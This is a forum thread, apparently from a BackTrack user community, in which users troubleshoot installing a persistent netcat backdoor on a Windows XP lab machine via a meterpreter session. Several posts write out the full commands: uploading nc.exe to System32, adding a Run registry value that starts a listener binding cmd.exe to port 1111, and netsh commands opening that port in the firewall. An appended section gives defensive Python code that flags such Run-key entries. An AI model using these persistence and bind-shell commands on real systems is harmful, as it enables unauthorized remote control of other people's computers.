Thread: netcat/backdoor

  1. #1
    zimmaro (Good friend of the forums) | Join Date: Mar 2010 | Location: milano | Posts: 407

    hello guys!
    I'm trying, on BT5 KDE, the "tutorial upload netcat backdoor" that worked when tested on BT3-4! I have a problem in BT5! My "laboratory" is a BT5 host, XP SP3 virtual, Vista virtual. When I obtain a meterpreter shell and run the commands, "everything looks perfect", but when I call the netcat I get connection refused! My commands are:
    *meterpreter> upload /root/nc.exe C:\\WINDOWS\\SYSTEM32\\ OK!
    *meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run OK!
    *meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\SYSTEM32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!
    Successful set CIAUZ.
    *meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run OK!

    OptionalComponents

    Values (4):

    VBoxTray
    Adobe Reader Speed Launcher
    Adobe ARM
    CIAUZ )))) :))))
    meterpreter >reboot OK!
    exit meterpreter shell OK!
    root@bt:~# nc 192.168.1.165 1111
    (UNKNOWN) [192.168.1.165] 1111 (?) : Connection refused PROBLEM!!!!!
    Sorry for my language! Thanks for all! Please help me! In BT3-4, with the same lab machine, the same network and the same commands, nc.exe starts up automatically in Windows!
    Bye, thanks!

  2. #2
    Just burned his ISO | Join Date: Mar 2010 | Posts: 18

    Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. For this:

    meterpreter > execute -f cmd -i

    Process 1604 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\Victim\My Documents > netsh firewall show opmode
    Netsh firewall show opmode

    C:\Documents and Settings\Victim\My Documents > netsh firewall add portopening TCP 1111 "Service Firewall" ENABLE ALL

    C:\Documents and Settings\Victim\My Documents > netsh firewall show portopening

    Bye Bye !!

  3. #3
    thorin (My life is this forum) | Join Date: Jan 2010 | Posts: 2,629

    So if you do a netstat on the system you're "attacking" do you see netcat listening on 1111? Does task manager on the "victim" machine show nc.exe running after you reboot it?
    Last edited by thorin; 05-26-2011 at 04:12 PM.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    zimmaro

    Thanks thorin for the reply! In netstat on the victim, netcat does not show as working on 1111, and in task manager (victim) I don't have nc.exe!!! I'm now testing on another old PC with BT4 R2 + XP SP3 virtual and IT'S OK!!!!! Mmmmm, what's DIFFERENT! Thanks, bye

  5. #5
    thorin

    Was your original post quoting info from the XP SP 3 machine or the Vista machine because you mention them both?

    Does nc.exe exist within C:\\WINDOWS\\SYSTEM32\\ as you originally uploaded it there? If you check event viewer on the victim, is there anything during boot up that shows why it may have failed to launch?

  6. #6
    zimmaro

    Thanks thorin!
    The quoted info is from XP SP3 (Vista is powered off, but it works with this command too). In C:\\WINDOWS\\SYSTEM32\\ I have nc.exe! As for the other check, event viewer........ I will do it tonight! My wife is breaking "my-balls"!!!!!! Many, many thanks! See you!

  7. #7
    zimmaro

    SOLVED! I'm happy: BT5 > XP SP3 virtual
    When I enter:
    reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe" OK!!!
    on the victim (XP), looking in regedit:
    CIAUZ REG_SZ C:WINDOWSsystem32nc.exe -L -d -p 1111 here is the error!
    I corrected it by hand:
    CIAUZ REG_SZ C:\WINDOWS\system32\nc.exe -L -d -p 1111 IT WORKS NOW )
    But I do not know where the error is! How many \\\\\\\\ to give in the attack command?
    Excuse my ignorance! Thanks to everyone! Special thanks to THORIN, bye

  8. #8
    zimmaro

    For datalife: thanks for the reply!
    I have all firewalls disabled (router, host, virtual)! From my bad experience
    I think the problem might be caused by Metasploit (meterpreter), because of the command
    reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v CIAUZ -d "C:\\WINDOWS\\system32\\nc.exe -L -d -p 1111 -e cmd.exe"
    But on the victim PC nc.exe does not start automatically because there is a mistake in the slashes \ \ \. Result on the victim (XP), looking in regedit:
    Ciauz REG_SZ C: WINDOWSsystem32nc.exe-L-d-p 1111 the error is here!
    I do not know where the problem is! Repeating the exact same situation (PC, network, virtual, etc.) in BT4 works fine for me! I'd like to know if the problem is mine alone. Thank you all!

  9. #9
    Senior Member | Join Date: Jul 2010 | Location: UK | Posts: 136

    Hi Zimmaro

    I've been testing this as well. Using BT5 - 32bit - Gnome and the Victim machine is XP SP3 (Not Virtual)

    I'm experiencing the same thing as you missing \ from the registry value "c:\windows\system32\nc.exe......."
    I've noticed though, that if you set the registry key like this;

    Code:
    reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d C:\\Windows\\system32\\nc.exe
    You will see the registry value is correct, c:\windows\system32\nc.exe

    But as soon as you use the " " to accommodate the spaces you lose the \ slashes

    I'll keep playing
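
An added example, not part of any post in this thread: defender-side triage of `reg query` output for the Run key discussed above. It flags the two things the thread shows, a value whose path has lost its backslashes (it never launches, but something still wrote it) and a command line that starts a listener with `-e`. The sample output, the function names and the reason labels are assumptions made for the example.

```python
import re

# Constructed `reg query` output for the Run key. Value names echo the thread;
# the VBoxTray and Adobe ARM paths are made up for the example.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VBoxTray    REG_SZ    C:\WINDOWS\system32\VBoxTray.exe
    Adobe ARM    REG_SZ    "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
    CIAUZ    REG_SZ    C:WINDOWSsystem32nc.exe -L -d -p 1111 -e cmd.exe
"""

ENTRY = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}

def split_command(data):
    """Split a Run value into (image path, argument list)."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        if end != -1:
            return data[1:end], data[end + 1:].split()
    parts = data.split()
    return (parts[0], parts[1:]) if parts else ("", [])

def triage(reg_output):
    """Return {value name: [reasons]} for Run entries worth a closer look."""
    findings = {}
    for line in reg_output.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        image, args = split_command(m["data"])
        flags = {a.lower() for a in args}
        reasons = []
        # Drive letter and colon with no separator after it: the value can
        # never launch, but someone or something still wrote it.
        if re.match(r"[A-Za-z]:[^\\/]", image):
            reasons.append("path-separators-missing")
        if re.split(r"[\\/]", image)[-1].lower() in NETCAT_NAMES:
            reasons.append("netcat-image")
        # Listen flag plus -e (run a program per connection), whatever the
        # binary is called, so a renamed copy is still caught.
        if "-l" in flags and "-e" in flags:
            reasons.append("listener-spawning-program")
        if reasons:
            findings[m["name"]] = reasons
    return findings
```

Calling `triage(SAMPLE)` reports only the `CIAUZ` value; an unquoted image path that contains spaces is split at the first space, so treat the result as a first pass.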

  10. #10
    zimmaro

    Hi jimmy87!
    You have the same problem (if I understand)!
    Now I don't have time for testing (because of my sons!!!)
    Try without "". Thanks! Bye, there is a big problem!
    When you think you understand something, you have to learn another!!!!!
    Bye
